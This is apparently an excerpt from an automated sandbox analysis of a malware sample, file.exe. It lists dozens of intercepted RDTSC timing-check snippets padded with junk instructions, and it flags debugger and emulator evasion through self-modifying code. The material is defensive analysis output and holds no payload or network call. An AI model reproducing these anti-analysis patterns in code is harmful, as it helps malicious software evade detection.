      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE3DD second address: 11FE3F5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnp 00007FA1BCFB6B76h 0x00000009 jns 00007FA1BCFB6B76h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007FA1BCFB6B76h 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FD630 second address: 11FD634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FD634 second address: 11FD659 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA1BCFB6B76h 0x00000008 jmp 00007FA1BCFB6B83h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jns 00007FA1BCFB6B82h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FD659 second address: 11FD65F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FD65F second address: 11FD667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FD90B second address: 11FD911 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FDA29 second address: 11FDA2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FDA2D second address: 11FDA36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FDA36 second address: 11FDA3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FDA3C second address: 11FDA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA1BD1DB176h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FDA4B second address: 11FDA51 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FDE4E second address: 11FDE55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE0E8 second address: 11FE135 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA1BCFB6B92h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jnc 00007FA1BCFB6B76h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FA1BCFB6B88h 0x0000001e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE135 second address: 11FE139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE139 second address: 11FE143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1206234 second address: 1206251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1BD1DB187h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1206251 second address: 120626A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007FA1BCFB6B7Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120626A second address: 120629D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FA1BD1DB184h 0x0000000c pop ecx 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007FA1BD1DB176h 0x00000017 jmp 00007FA1BD1DB17Dh 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11474C8 second address: 11474F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FA1BCFB6B7Fh 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push edi 0x0000000d jmp 00007FA1BCFB6B7Fh 0x00000012 pop edi 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1204247 second address: 120425D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1BD1DB182h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120425D second address: 12042AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FA1BCFB6B85h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d jmp 00007FA1BCFB6B86h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA1BCFB6B89h 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1204E17 second address: 1204E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1204E1C second address: 1204E41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FA1BCFB6B80h 0x0000000a jmp 00007FA1BCFB6B7Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1204E41 second address: 1204E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c ja 00007FA1BD1DB176h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 jmp 00007FA1BD1DB182h 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1204FE9 second address: 1205009 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FA1BCFB6B82h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007FA1BCFB6B78h 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120517F second address: 12051A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA1BD1DB188h 0x0000000c js 00007FA1BD1DB176h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1205947 second address: 1205951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FA1BCFB6B76h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12060EB second address: 1206102 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1BD1DB183h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1206102 second address: 120611D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA1BCFB6B83h 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120611D second address: 1206121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1206121 second address: 1206127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120D713 second address: 120D719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120D719 second address: 120D75A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA1BCFB6B76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jns 00007FA1BCFB6B76h 0x00000013 jmp 00007FA1BCFB6B82h 0x00000018 pop esi 0x00000019 jmp 00007FA1BCFB6B87h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120D87E second address: 120D882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120D882 second address: 120D88B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120D88B second address: 120D8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1BD1DB181h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120D8A2 second address: 120D8F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1BCFB6B7Bh 0x00000009 popad 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jno 00007FA1BCFB6B89h 0x00000012 push esi 0x00000013 jmp 00007FA1BCFB6B84h 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FA1BCFB6B7Dh 0x00000020 jbe 00007FA1BCFB6B76h 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120DA76 second address: 120DA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B8B3 second address: 121B8CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 jmp 00007FA1BCFB6B82h 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B8CE second address: 121B8DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jne 00007FA1BD1DB176h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1220A57 second address: 1220AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1BCFB6B7Fh 0x00000009 jbe 00007FA1BCFB6B8Fh 0x0000000f jmp 00007FA1BCFB6B89h 0x00000014 jns 00007FA1BCFB6B92h 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FA1BCFB6B84h 0x00000023 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1220AC3 second address: 1220AC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1220AC9 second address: 1220AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FA1BCFB6B89h 0x0000000c jmp 00007FA1BCFB6B83h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1220AEC second address: 1220AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12205FD second address: 1220602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1220602 second address: 1220618 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FA1BD1DB176h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c jng 00007FA1BD1DB17Eh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1220618 second address: 122064B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA1BCFB6B7Ch 0x0000000d push esi 0x0000000e jmp 00007FA1BCFB6B7Eh 0x00000013 jmp 00007FA1BCFB6B7Fh 0x00000018 pop esi 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122064B second address: 1220655 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA1BD1DB17Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12255D3 second address: 12255D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12255D7 second address: 12255DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C087 second address: 122C08D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C08D second address: 122C092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C092 second address: 122C099 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1152EC5 second address: 1152F12 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA1BD1DB176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jne 00007FA1BD1DB176h 0x00000013 jmp 00007FA1BD1DB17Bh 0x00000018 popad 0x00000019 jmp 00007FA1BD1DB187h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FA1BD1DB185h 0x00000025 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230276 second address: 123028E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1BCFB6B7Eh 0x00000007 jbe 00007FA1BCFB6B7Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12389A1 second address: 12389A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12389A5 second address: 12389BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1BCFB6B7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12389BA second address: 12389BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12389BE second address: 12389C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1238C29 second address: 1238C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1238C2D second address: 1238C37 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA1BCFB6B76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D64E second address: 123D652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D652 second address: 123D656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D656 second address: 123D65E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D65E second address: 123D667 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D667 second address: 123D66D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D243 second address: 123D248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1241498 second address: 12414DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FA1BD1DB187h 0x0000000d jns 00007FA1BD1DB176h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007FA1BD1DB185h 0x0000001a popad 0x0000001b push eax 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1247F5C second address: 1247F7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1BCFB6B89h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1247F7B second address: 1247F80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1257E51 second address: 1257E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1257E55 second address: 1257E6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007FA1BD1DB17Eh 0x0000000c pop esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1259D85 second address: 1259D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1BCFB6B7Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1259D99 second address: 1259DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1259A56 second address: 1259A69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1BCFB6B7Fh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270911 second address: 1270917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126F857 second address: 126F85D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126F996 second address: 126F9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jbe 00007FA1BD1DB188h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FA1BD1DB180h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126F9B9 second address: 126F9BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126F9BD second address: 126F9C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126F9C1 second address: 126F9C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126FCB5 second address: 126FCBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127061B second address: 1270620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12746EB second address: 12746F0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127492C second address: 1274931 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1274931 second address: 1274966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dh, bh 0x0000000e sub dword ptr [ebp+122D30F8h], esi 0x00000014 push 00000004h 0x00000016 pushad 0x00000017 cld 0x00000018 mov dx, si 0x0000001b popad 0x0000001c push 024DE8F2h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jmp 00007FA1BD1DB17Fh 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1274966 second address: 127496B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1274BE6 second address: 1274C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FA1BD1DB183h 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f jmp 00007FA1BD1DB17Dh 0x00000014 je 00007FA1BD1DB17Ch 0x0000001a jo 00007FA1BD1DB176h 0x00000020 popad 0x00000021 nop 0x00000022 push 00000000h 0x00000024 push eax 0x00000025 call 00007FA1BD1DB178h 0x0000002a pop eax 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f add dword ptr [esp+04h], 00000016h 0x00000037 inc eax 0x00000038 push eax 0x00000039 ret 0x0000003a pop eax 0x0000003b ret 0x0000003c adc dl, 0000005Eh 0x0000003f push dword ptr [ebp+122D1C07h] 0x00000045 mov dx, di 0x00000048 push 7D9FD207h 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FA1BD1DB189h 0x00000054 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1276110 second address: 1276141 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007FA1BCFB6B76h 0x00000009 jnp 00007FA1BCFB6B76h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FA1BCFB6B89h 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1276141 second address: 1276147 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1276147 second address: 1276156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jo 00007FA1BCFB6B76h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1276156 second address: 127615B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127615B second address: 1276167 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA1BCFB6B7Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1195277 second address: 119527B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Tries to evade debugger and weak emulator (self modifying code)
      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: FE8BA9 instructions caused by: Self-modifying code
